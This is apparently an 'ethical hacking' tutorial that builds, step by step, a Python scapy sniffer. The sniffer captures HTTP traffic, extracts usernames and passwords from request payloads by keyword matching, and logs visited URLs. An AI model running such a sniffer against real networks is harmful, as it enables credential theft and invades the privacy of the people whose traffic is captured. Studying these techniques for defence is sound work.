• Python Ethical Hacking


    PACKET_SNIFFER

    • Capture data flowing through an interface.
    • Filter this data.
    • Display interesting information such as:
      • Login info (username & password).
      • Visited websites.
      • Images.
      • etc.


    CAPTURE & FILTER DATA

    • scapy provides a sniff function.
    • It can capture data sent to/from an interface.
    • It can call a callback function, specified via prn, on each captured packet.
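The prn callback pattern can be illustrated without a live capture. fake_sniff and the string "packets" below are hypothetical stand-ins for scapy.sniff and real packets, which require scapy and root privileges:

```python
# Simulate scapy.sniff's dispatch loop: prn is a callback invoked once per
# captured packet. fake_sniff and the string packets are made-up stand-ins.
def fake_sniff(packets, prn):
    for packet in packets:
        prn(packet)  # scapy invokes prn like this for each packet

seen = []
fake_sniff(["GET /index.html", "POST /login"], prn=seen.append)
print(seen)  # -> ['GET /index.html', 'POST /login']
```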

    Install the third-party package (only needed for scapy versions older than
    2.4.3; newer versions bundle the HTTP layer as scapy.layers.http):

     pip install scapy_http

    1. Write a Python script to sniff and display HTTP request packets that carry a Raw payload.

    #!/usr/bin/env python
    
    import scapy.all as scapy
    from scapy.layers.http import HTTPRequest
    
    def sniff(interface):
        # store=False avoids keeping packets in memory; prn runs on every packet
        scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            if packet.haslayer(scapy.Raw):
                packet.show()  # show() prints the packet itself; print(packet.show()) adds a stray "None"
    
    sniff("eth0")

    Execute the script and sniff the packets on eth0.

    2. Filter for the useful payload data.

    #!/usr/bin/env python
    
    import scapy.all as scapy
    from scapy.layers.http import HTTPRequest
    
    def sniff(interface):
        scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            if packet.haslayer(scapy.Raw):
                print(packet[scapy.Raw].load)  # raw payload, e.g. submitted form data
    
    sniff("eth0")

    Execute the script and sniff the packets on eth0.

    3. Rewrite the Python script to filter for keywords.

    #!/usr/bin/env python
    
    import scapy.all as scapy
    from scapy.layers.http import HTTPRequest
    
    
    def sniff(interface):
        scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            if packet.haslayer(scapy.Raw):
                load = packet[scapy.Raw].load.decode(errors='ignore')
                keywords = ["username", "user", "login", "password", "pass"]
                for keyword in keywords:
                    if keyword in load:
                        print(load)
                        break  # one hit is enough; avoid printing the same load repeatedly
    
    
    sniff("eth0")
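The keyword check can be exercised offline on a sample payload. The POST body below is a made-up example, not captured data, and the loop collects every match rather than breaking on the first:

```python
# Hypothetical POST body standing in for packet[scapy.Raw].load.decode(...)
load = "username=admin&password=s3cret"
keywords = ["username", "user", "login", "password", "pass"]

# Same membership test as the script above, collecting all matching keywords
matches = [kw for kw in keywords if kw in load]
print(matches)  # -> ['username', 'user', 'password', 'pass']
```

Note that "user" and "pass" match as substrings of "username" and "password", which is why the script prints the load once and breaks instead of printing per keyword.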

    4. Add a feature: extract the request URL.

    #!/usr/bin/env python
    
    import scapy.all as scapy
    from scapy.layers.http import HTTPRequest
    
    
    def sniff(interface):
        scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            # Host and Path are bytes in Python 3; decode them before printing
            url = (packet[HTTPRequest].Host + packet[HTTPRequest].Path).decode(errors='ignore')
            print(url)
    
            if packet.haslayer(scapy.Raw):
                load = packet[scapy.Raw].load.decode(errors='ignore')
                keywords = ["username", "user", "login", "password", "pass"]
                for keyword in keywords:
                    if keyword in load:
                        print(load)
                        break
    
    
    sniff("eth0")
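Host and Path come back as bytes objects in Python 3, which is why the script decodes the concatenation. A standalone sketch with made-up values:

```python
# Hypothetical field values; scapy's HTTPRequest returns bytes in Python 3
host = b"testsite.example"
path = b"/login.php"

url = (host + path).decode(errors="ignore")
print(url)  # -> testsite.example/login.php
```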

  • Original article: https://www.cnblogs.com/keepmoving1113/p/11386213.html